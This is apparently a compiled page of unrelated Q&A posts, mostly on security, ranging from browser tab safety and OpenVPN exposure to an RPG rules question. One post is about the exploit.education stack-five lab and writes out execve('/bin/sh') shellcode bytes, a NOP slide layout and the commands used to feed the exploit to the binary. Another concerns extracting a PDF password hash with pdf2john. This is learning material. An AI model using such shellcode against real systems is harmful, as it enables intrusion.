How safe is opening any website on new browser tab?

When I do online shopping where I use my credit card information to purchase, I clear the browser cache, cookies and only open that single site. After I am done, I again clear the cache, cookies and start with my regular browsing. I do this to ensure any other websites that I open on a new tab do not sneak into my credit card information. Is this even possible or just a myth?

So if I wish to open "any" site on a new tab while doing my online shopping, is it safe or do I have to clear cookies every time and open only one site?

Exploit education stack-five: trouble opening shell

Im trying the phoenix vm, challenge stack-five on exploit.education (http://exploit.education/phoenix/stack-five/). I run onto a problem while exploiting a stack overflow. The challenge is run execve(‘/bin/sh’) through shellcode. I grabbed the shellcode from shellstorm (http://shell-storm.org/shellcode/files/shellcode-603.php). The shellcode consists of:

[NOP slide] (debug int3 \xcc) "\x48\x31\xd2"                                  // xor    %rdx, %rdx "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"      // mov  $  0x68732f6e69622f2f, %rbx "\x48\xc1\xeb\x08"                              // shr    $  0x8, %rbx "\x53"                                          // push   %rbx "\x48\x89\xe7"                                  // mov    %rsp, %rdi "\x50"                                          // push   %rax "\x57"                                          // push   %rdi "\x48\x89\xe6"                                  // mov    %rsp, %rsi "\xb0\x3b"                                      // mov    $  0x3b, %al "\x0f\x05";                                     // syscall (debug int3 \xcc) [padding] [override rip pointing to the middle of the NOP slide] 

I have tested int3’s before and after the shellcode and all seems fine, they both trigger outside and inside gdb and therefore I infer that the shellcode is being executed but i cannot get the shell open.

I’m using this commands:

cat | /opt/phoenix/amd64/stack-five < exploit 
cat exploit - | /opt/phoenix/amd64/stack-five 

Neither of them gets the shell.

Example of execution

user@phoenix-amd64:~$   cat exploit - | /opt/phoenix/amd64/stack-five cat exploit - | /opt/phoenix/amd64/stack-five Welcome to phoenix/stack-five, brought to you by https://exploit.education [ 7018.986649] traps: stack-five[433] trap int3 ip:7fffffffe68e sp:7fffffffe6c8 error:0 whoami Trace/breakpoint trap 

This int3 is AFTER the shellcode.

Some idea of what’s wrong?

John the Ripper: Cannot extract hash from PDF because Python keeps opening?

I’m having a really strange issue. I’m attempting to extract a hash from a user-password encrypted .pdf with John the Ripper’s pdf2john tool, but every time I run the command:

c:\...\run\pdf2john.pl mypdf.pdf 

My Python IDE (Visual Studio Code) opens up the pdf2john.pl file and the following appears in the command line:

[main 2020-06-18T10:02:06.775Z] update#setState idle (node:15044) Electron: Loading non context-aware native modules in the renderer process is deprecated and will stop working at some point in the future, please see https://github.com/electron/electron/issues/18397 for more information [main 2020-06-18T10:02:36.776Z] update#setState checking for updates [main 2020-06-18T10:02:36.934Z] update#setState downloading 

Any ideas on how to stop my IDE from opening up and having the command actually work as expected? The latest version of Perl is installed on my machine.

Should I worry about a cmd opening and typing “echo off”?

I some days see a cmd.exe opening and typing “echo off”, then disappear.

My computer is slow, but I’m not sure if a program running with first line “echo off” would be so slow as to let me see it being typed… That’s a reason to believe it’s a person.

On the other hand, if someone else log into one’s pc, it will open a new session, so you’ll not see what he’s running, right?

I’m not sure if I should worry.

I’m running Windows 10.

Opening a skill with B1 stat as root

Suppose a character has perception B1 (maybe they are a young troll or something). If they open their observation skill, either in character burning or through play (testing, practice, instruction). Are all of the following consequences true, or have I misunderstood something? The points are in no way specific to perception and observation; those are just examples.

  1. The new skill opens at B0.

  2. The new skill can not be rolled, even with artha. That is, it is no longer possible for the character to even try rolls they could try before opening the skill, even under neutral or favourable conditions.

  3. The only way to reacquire the ability to make observation tests is to get practice or instruction to increase the skill to B1. (In character burning, one might have extra skill points to increase the skill beyond just opening, but let us ignore this for now).

The consequence number two seems quite unintuitive, which is why I am asking.

Is opening a blog, publishing technological/educational content on it and earning money via blogger earning methods like AdSense legal?

I am planning to open a blog website and publish technology-based educational content as articles in Turkish language on it. Topics I’ll cover are Microsoft and Linux system administration, cyber security, software, hardware, web, mobile, desktop applications with their usage and much more things like this.

More clearly, for example, I’ll post:

  • What is Active Directory and How to Install it on Windows version x.x.x?
  • How to Configure DNS Server on Ubuntu?
  • What should be considered for cyber security?
  • What are social engineering methods and how to implement them?
  • How to run JavaScript code in C# App? (or it can be complete JavaScript tutorial)
  • What are the differences between USB 2.0 and 3.0?
  • How to change desktop wallpaper on Windows 10?
  • How to change screen brightness on IOS version x.x.x?
  • How to use TeamViewer?

As you guess, for all of these, I need tons of programs, software, tools like VMware, virtual machines like Kali Linux, Ubuntu, Windows Server 2012 or 2016, Windows 8 or 10 and screenshots.

I am planning to use trial, free or non-commercial version of these for preparing my content. My future plan is adding English articles and video contents to my blog. However, I don’t know using the tools, software and programs the way I mentioned with making money purpose is legal.

Any advice would be great.

SSD not working anymore and windows not opening [migrated]

I’m struggling with a problem: the Windows suddenly stopped working when I connected the HDD with rack on my laptop. I’ve tried almost everything, so later on I have discovered after re-installing the HDD, and place the SSD in the rack that SSD is not initialized and also, is 100% free. After that, I tried to recover the files from the SSD because I’ve lost sensitive information and a lot of photos from the past years… nothing worked, What happened and what solutions do you think I have? Is the SSD broken somehow? EDIT: Last error when I`m trying to initialize enter image description here

Opening OpenVPN to the world

I built my own private network with OpenVPN. I bought a VPS at hosting provider A(closer to home) and another two at hosting provider B(cheaper). Using openvpn I connected the two to the OpenVPN server.

I configured the hosts at B to ONLY ALLOW connections from the VPN using UFW, so they should be safe. But now I’m scared to open the ports for the OpenVPN server(port 80 and 443). I want to do this so that I can connect from everywhere to my VPN, accessing Bitwarden and a network share(more to come).

Can people/bots exploit OpenVPN server to gain access to my network? Everything is possible right? Btw, you need a key + password to connect to my OpenVPN server.

Is fail2ban the only extra security? What can/should I do to add extra layers of security to the OpenVPN server? Port 80 and 443 are the only two “holes” in my network so I want to protect them the most. What can I do to achieve the maximum security while still being able to connect to my VPN from everywhere.

pycharm opening ports

By running a simple port scan, I have noticed that pycharm is opening three ports on the machines it is installed on.

Pycharm is a great tool for developer, but it seems fairly awful to me on the security side. Opening ports is a known security hole, and they do not advertise loudly they are doing so.

How can I prevent pycharm from opening ports?